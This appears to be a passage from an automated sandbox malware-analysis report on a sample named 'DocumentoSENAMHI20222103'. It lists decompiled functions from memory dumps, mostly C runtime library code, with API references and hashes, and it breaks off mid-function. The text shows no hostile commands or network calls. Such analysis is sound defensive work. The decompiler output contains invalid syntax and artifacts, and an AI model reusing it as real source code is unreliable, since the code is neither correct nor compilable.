Download Yara Rule

C-Code - Quality: 100%

			E00159F50(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E0015B146(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E0015B146(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0015759E(GetLastError());
									_t19 =  *((intOrPtr*)(E001575D4(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E0015A58C(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0015759E(GetLastError());
						return  *((intOrPtr*)(E001575D4(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E0015A58C(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E0015A572(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00159f57
0x00159f5c
0x00159f7a
0x00159f7c
0x00159f7f
0x00159fac
0x00159fb4
0x00159fb6
0x00159fcf
0x00159fd2
0x00159fd5
0x00159fe3
0x00159ff2
0x00159ffa
0x00159ffc
0x0015a015
0x0015a018
0x0015a018
0x00159ffe
0x0015a005
0x0015a010
0x0015a010
0x0015a01a
0x00000000
0x0015a01a
0x00159fda
0x00159fdf
0x00159fe1
0x00000000
0x00000000
0x00000000
0x00159fe1
0x00159fbf
0x00000000
0x00159fca
0x00159f81
0x00159f84
0x00159f87
0x00159f9a
0x00159f9d
0x00159f70
0x00159f70
0x00000000
0x00159f73
0x00159f8d
0x00159f92
0x00159f94
0x0015a01e
0x0015a01e
0x00000000
0x00159f94
0x00159f5e
0x00159f63
0x00159f68
0x00159f6a
0x00159f6d
0x00000000

APIs

Part of subcall function 0015A572: _free.LIBCMT ref: 0015A580

Part of subcall function 0015B146: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,0015DE4D,0000FDE9,00000000,?,?,?,0015DBC6,0000FDE9,00000000,?), ref: 0015B1F2

GetLastError.KERNEL32 ref: 00159FB8
__dosmaperr.LIBCMT ref: 00159FBF
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00159FFE
__dosmaperr.LIBCMT ref: 0015A005

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: b9971c73cbd6245a2cf1e7b51d61b4cb42b5bebeafc9ed5eb820ce8355b0aeaf
Instruction ID: 7e3e35243a40b29dbd540e9ad85d6e70980d734ec06bf786abaa67b0a06f2181
Opcode Fuzzy Hash: b9971c73cbd6245a2cf1e7b51d61b4cb42b5bebeafc9ed5eb820ce8355b0aeaf
Instruction Fuzzy Hash: 3421C471614205EFDB20AF619C81D6B7BACEF153667508619FC35DF190E730EC449B62

Uniqueness

Uniqueness Score: -1.00%

Function 00151A54 Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00151A54(void* __ebx, intOrPtr* __edi, intOrPtr* __esi, void* __eflags) {
				struct _CRITICAL_SECTION* _t22;
				void* _t25;
				void* _t28;
				void* _t29;
				void* _t49;
				void* _t50;
				void* _t52;

				_t48 = __esi;
				_t47 = __edi;
				_push(0x10);
				E00160216(0x1607fb, __ebx, __edi, __esi);
				_t36 =  *((intOrPtr*)(_t49 + 0xc));
				if( *((intOrPtr*)(_t49 + 0xc)) != 0 &&  *((intOrPtr*)(_t49 + 0x10)) != 0) {
					_t22 =  *((intOrPtr*)(_t49 + 8)) + 0x10;
					 *(_t49 - 0x1c) = _t22;
					EnterCriticalSection(_t22);
					_t48 = 0;
					 *((intOrPtr*)(_t49 - 0x18)) = 0;
					 *((intOrPtr*)(_t49 - 4)) = 0;
					 *((intOrPtr*)(_t49 - 0x14)) = E001575E7(_t36) + 1;
					_t25 = E00151181(_t49 - 0x14, E001575E7(_t36) + 1);
					_t52 = _t50 + 4;
					if(_t25 < 0) {
						L9:
						_t36 = 0x8007000e;
					} else {
						_t47 =  *((intOrPtr*)(_t49 - 0x14));
						_t57 = _t47 - 0x400;
						if(_t47 > 0x400 || E001511AE(_t36, _t47, _t47, 0, _t57) == 0) {
							_t28 = E00153CD7(_t49 - 0x18, _t48, _t47);
							_t48 =  *((intOrPtr*)(_t49 - 0x18));
						} else {
							E001602F0(_t47);
							_t28 = _t52;
						}
						_t29 = E00151251(_t28, _t36, _t47, 3);
						_t59 = _t29;
						if(_t29 == 0) {
							goto L9;
						} else {
							_push( *((intOrPtr*)(_t49 + 0x10)));
							_push(_t29);
							_t47 = E0015175A(_t36,  *((intOrPtr*)(_t49 + 8)) + 4, _t47, _t48, _t59);
							LeaveCriticalSection( *(_t49 - 0x1c));
							_t36 =  !=  ? 0 : 0x8007000e;
						}
					}
					if(_t48 != 0) {
						do {
							_t47 =  *_t48;
							_t48 = _t47;
							E00157188(_t48);
						} while (_t47 != 0);
					}
				}
				return E001601C5(_t36, _t47, _t48);
			}

0x00151a54
0x00151a54
0x00151a54
0x00151a5b
0x00151a60
0x00151a65
0x00151a78
0x00151a7c
0x00151a7f
0x00151a85
0x00151a87
0x00151a8b
0x00151a99
0x00151a9c
0x00151aa1
0x00151aa6
0x00151b0d
0x00151b0d
0x00151aa8
0x00151aa8
0x00151aab
0x00151ab1
0x00151acd
0x00151ad2
0x00151abe
0x00151ac0
0x00151ac5
0x00151ac5
0x00151adc
0x00151ae1
0x00151ae3
0x00000000
0x00151ae5
0x00151ae8
0x00151aeb
0x00151af7
0x00151af9
0x00151b08
0x00151b08
0x00151ae3
0x00151b14
0x00151b16
0x00151b16
0x00151b19
0x00151b1b
0x00151b21
0x00151b16
0x00151b25
0x00151b36

APIs

__EH_prolog3_GS.LIBCMT ref: 00151A5B
EnterCriticalSection.KERNEL32(?,00000010,0015362B,?,Module,?), ref: 00151A7F
LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,?), ref: 00151AF9

Part of subcall function 001511AE: __alloca_probe_16.LIBCMT ref: 001511D1

__alloca_probe_16.LIBCMT ref: 00151AC0

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: CriticalSection__alloca_probe_16$EnterH_prolog3_Leave
String ID:
API String ID: 4018831387-0
Opcode ID: 890f5b959c952ee3775c8869c536ab56eaa113d5e6a7ad0ecac796a32147799e
Instruction ID: f358545c0e53e403aec1e4bedab9307c771f1c439e3db3d7941aca58297abebf
Opcode Fuzzy Hash: 890f5b959c952ee3775c8869c536ab56eaa113d5e6a7ad0ecac796a32147799e
Instruction Fuzzy Hash: D9219D36A00205EBCB129FA8C8857AE76B5AF58302F154419ED25AF241EB74DD49CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001590A4 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E001590A4(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x169050; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0015995D(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00159E27(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0015995D(__eflags,  *0x169050, _t51);
							if(__eflags != 0) {
								E00158ED2(_t51, 0x29295c);
								E00158B82(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0015995D(__eflags,  *0x169050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0015995D(0,  *0x169050, 0);
							_push(0);
							L9:
							E00158B82();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E0015991E(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x169050; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00158A26(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x169050; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0015995D(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00159E27(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0015995D(__eflags,  *0x169050, _t60);
								if(__eflags != 0) {
									E00158ED2(_t60, 0x29295c);
									E00158B82(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0015995D(__eflags,  *0x169050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0015995D(__eflags,  *0x169050, _t20);
								_push(_t60);
								L25:
								E00158B82();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E0015991E(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x169050; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00158A26(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x169050; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0015995D(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00159E27(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0015995D(__eflags,  *0x169050, _t54);
											if(__eflags != 0) {
												E00158ED2(_t54, 0x29295c);
												E00158B82(0);
												goto L45;
											} else {
												_t40 = 0;
												E0015995D(__eflags,  *0x169050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0015995D(0,  *0x169050, 0);
											_push(0);
											L41:
											E00158B82();
											goto L36;
										}
									}
								} else {
									_t54 = E0015991E(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x169050; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x001590a4
0x001590a4
0x001590af
0x001590b1
0x001590b6
0x001590b9
0x001590d7
0x001590da
0x001590df
0x001590e1
0x00000000
0x001590e3
0x001590ef
0x001590f2
0x001590f3
0x001590f5
0x0015911a
0x0015911c
0x00159135
0x0015913c
0x00159141
0x00000000
0x0015911e
0x0015911e
0x00159127
0x0015912c
0x00000000
0x0015912c
0x001590f7
0x001590f7
0x001590f7
0x00159100
0x00159105
0x00159106
0x00159106
0x0015910b
0x00000000
0x0015910b
0x001590f5
0x001590bb
0x001590c1
0x001590c5
0x001590d2
0x00000000
0x001590c7
0x001590ca
0x00159144
0x00159144
0x001590cc
0x001590cc
0x001590cc
0x001590ce
0x001590ce
0x001590ce
0x001590ca
0x001590c5
0x00159147
0x0015914f
0x00159151
0x00159153
0x0015915b
0x00159160
0x00159161
0x00159166
0x00159167
0x0015916a
0x00159184
0x00159187
0x0015918c
0x0015918e
0x00000000
0x00159190
0x0015919c
0x0015919f
0x001591a0
0x001591a2
0x001591c5
0x001591c7
0x001591de
0x001591e5
0x001591ea
0x00000000
0x001591c9
0x001591d0
0x001591d5
0x00000000
0x001591d5
0x001591a4
0x001591ab
0x001591b0
0x001591b1
0x001591b1
0x001591b6
0x00000000
0x001591b6
0x001591a2
0x0015916c
0x00159172
0x00159174
0x00159176
0x0015917f
0x00000000
0x00159178
0x00159178
0x0015917b
0x001591f5
0x001591f5
0x001591fa
0x001591fd
0x001591fe
0x001591ff
0x00159206
0x00159208
0x0015920d
0x00159210
0x0015922e
0x00159231
0x00159236
0x00159238
0x00000000
0x0015923a
0x00159246
0x0015924a
0x0015924c
0x00159271
0x00159273
0x0015928c
0x00159293
0x00000000
0x00159275
0x00159275
0x0015927e
0x00159283
0x00000000
0x00159283
0x0015924e
0x0015924e
0x0015924e
0x00159257
0x0015925c
0x0015925d
0x0015925d
0x00000000
0x00159262
0x0015924c
0x00159212
0x00159218
0x0015921a
0x0015921c
0x00159229
0x00000000
0x0015921e
0x0015921e
0x00159221
0x0015929b
0x0015929b
0x00159223
0x00159223
0x00159223
0x00159223
0x00159225
0x00159225
0x00159225
0x00159221
0x0015921c
0x0015929e
0x001592a6
0x001592a8
0x001592a8
0x001592af
0x0015917d
0x001591ed
0x001591ed
0x001591ef
0x00000000
0x001591f1
0x001591f4
0x001591f4
0x001591ef
0x0015917b
0x00159176
0x00159155
0x0015915a
0x0015915a

APIs

GetLastError.KERNEL32(?,?,?,00157123,?,?,00000000,?,00159C0E,00000000,00000000,?,00000000), ref: 001590A9
_free.LIBCMT ref: 00159106
_free.LIBCMT ref: 0015913C
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00159C0E,00000000,00000000,?,00000000), ref: 00159147

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c983c03d31fbb0429c62250d960a426ea6380ef5106283fc2ae4a389a22f4444
Instruction ID: 2b93e0c53199310967077fd11cd1db781a1dc485108051918f24ef6f2ab445f8
Opcode Fuzzy Hash: c983c03d31fbb0429c62250d960a426ea6380ef5106283fc2ae4a389a22f4444
Instruction Fuzzy Hash: 7A11C672204612EB9A1026B59DC5D3B226D9BD137FB290628FE399F1D1DFA18C0CC112

Uniqueness

Uniqueness Score: -1.00%

Function 001591FB Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E001591FB(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x169050; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0015995D(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00159E27(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E0015995D(__eflags,  *0x169050, _t18);
							if(__eflags != 0) {
								E00158ED2(_t18, 0x29295c);
								E00158B82(0);
								goto L13;
							} else {
								_t13 = 0;
								E0015995D(__eflags,  *0x169050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E0015995D(0,  *0x169050, 0);
							_push(0);
							L9:
							E00158B82();
							goto L4;
						}
					}
				} else {
					_t18 = E0015991E(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x169050; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00159206
0x00159208
0x0015920d
0x00159210
0x0015922e
0x00159231
0x00159236
0x00159238
0x00000000
0x0015923a
0x00159246
0x0015924a
0x0015924c
0x00159271
0x00159273
0x0015928c
0x00159293
0x00000000
0x00159275
0x00159275
0x0015927e
0x00159283
0x00000000
0x00159283
0x0015924e
0x0015924e
0x0015924e
0x00159257
0x0015925c
0x0015925d
0x0015925d
0x00000000
0x00159262
0x0015924c
0x00159212
0x00159218
0x0015921c
0x00159229
0x00000000
0x0015921e
0x00159221
0x0015929b
0x0015929b
0x00159223
0x00159223
0x00159223
0x00159225
0x00159225
0x00159225
0x00159221
0x0015921c
0x0015929e
0x001592a6
0x001592af

APIs

GetLastError.KERNEL32(?,?,?,001575D9,0015116B), ref: 00159200
_free.LIBCMT ref: 0015925D
_free.LIBCMT ref: 00159293
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,001575D9,0015116B), ref: 0015929E

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 949b10aa69a7f444b53de70d2c5b69b4d51d6559b1c821fdca1573e5bd01413c
Instruction ID: 99c4333eb735197b56a79dac6a5a688341cc0c1a8d2a2e42929e7ed8c07c6b34
Opcode Fuzzy Hash: 949b10aa69a7f444b53de70d2c5b69b4d51d6559b1c821fdca1573e5bd01413c
Instruction Fuzzy Hash: 09118632208101FB9A1126B4AD85E2B335DDBD17BBF25022CFD389E5D1DF618C4D9112

Uniqueness

Uniqueness Score: -1.00%

Function 0015F486 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0015F486(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x169860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0015F46F();
					E0015F431();
					_t13 = WriteConsoleW( *0x169860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0015f4a3
0x0015f4a7
0x0015f4b4
0x0015f4b9
0x0015f4d4
0x0015f4d4
0x0015f4da

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?), ref: 0015F49D
GetLastError.KERNEL32(?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?,?,?,?,0015DDE8,00000000), ref: 0015F4A9

Part of subcall function 0015F46F: CloseHandle.KERNEL32(FFFFFFFE,0015F4B9,?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?,?,?), ref: 0015F47F

___initconout.LIBCMT ref: 0015F4B9

Part of subcall function 0015F431: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0015F460,0015E616,?,?,0015D89C,?,00000000,?,?), ref: 0015F444

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0015E629,?,00000001,?,?,?,0015D89C,?,00000000,?,?), ref: 0015F4CE

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3a02ae91eb1ecfb3ad132e743ed2e669961f42edb3379d02f1d811db3afdd447
Instruction ID: 82c1c0d126ea5157ac1a723ac7e29b35eb072831ca3af8620b1cd1b5f6d32c6d
Opcode Fuzzy Hash: 3a02ae91eb1ecfb3ad132e743ed2e669961f42edb3379d02f1d811db3afdd447
Instruction Fuzzy Hash: D9F01236400128FBCF122FD1DC0498A3F6AFB153B2B144128FE28D9530C77188A1DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 001585AB Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001585AB() {

				E00158B82( *0x292954);
				 *0x292954 = 0;
				E00158B82( *0x292958);
				 *0x292958 = 0;
				E00158B82( *0x292db0);
				 *0x292db0 = 0;
				E00158B82( *0x292db4);
				 *0x292db4 = 0;
				return 1;
			}

0x001585b4
0x001585c1
0x001585c7
0x001585d2
0x001585d8
0x001585e3
0x001585e9
0x001585f1
0x001585fa

APIs

_free.LIBCMT ref: 001585B4

Part of subcall function 00158B82: HeapFree.KERNEL32(00000000,00000000,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?), ref: 00158B98
Part of subcall function 00158B82: GetLastError.KERNEL32(?,?,0015BD3B,?,00000000,?,?,?,0015BD62,?,00000007,?,?,0015C188,?,?), ref: 00158BAA

_free.LIBCMT ref: 001585C7
_free.LIBCMT ref: 001585D8
_free.LIBCMT ref: 001585E9

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 13beff986658b53cc7eed724efb3f4293d0bc09119b94d6f65647876dde5d68c
Instruction ID: 9ec68a8dd339d176311eda682984fc04a22dddf44fe982939661e5aa95197e01
Opcode Fuzzy Hash: 13beff986658b53cc7eed724efb3f4293d0bc09119b94d6f65647876dde5d68c
Instruction Fuzzy Hash: 22E0ECB19261A1FE9A066F19FD19C893F6DF764722B55010BFC202A231CB350A5F9FE1

Uniqueness

Uniqueness Score: -1.00%

Function 00157CE5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00157CE5(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E0015AD73(_t48);
						E0015A7BA(_t48, _t57, 0, 0x2927f8, 0, 0x2927f8, 0x104);
						_t26 =  *0x292db8; // 0xa033e8
						 *0x292da8 = 0x2927f8;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x2927f8;
							_v20 = 0x2927f8;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00157F8F(E00157E1B( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00157E1B( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E0015A6AD(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x292dac = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x292db0 = _t58;
											L18:
											E00158B82(_t37);
											_v12 = 0;
											L19:
											E00158B82(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x292dac = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x292db0 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E001575D4(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E001575D4(__eflags);
					_t66 = 0x16;
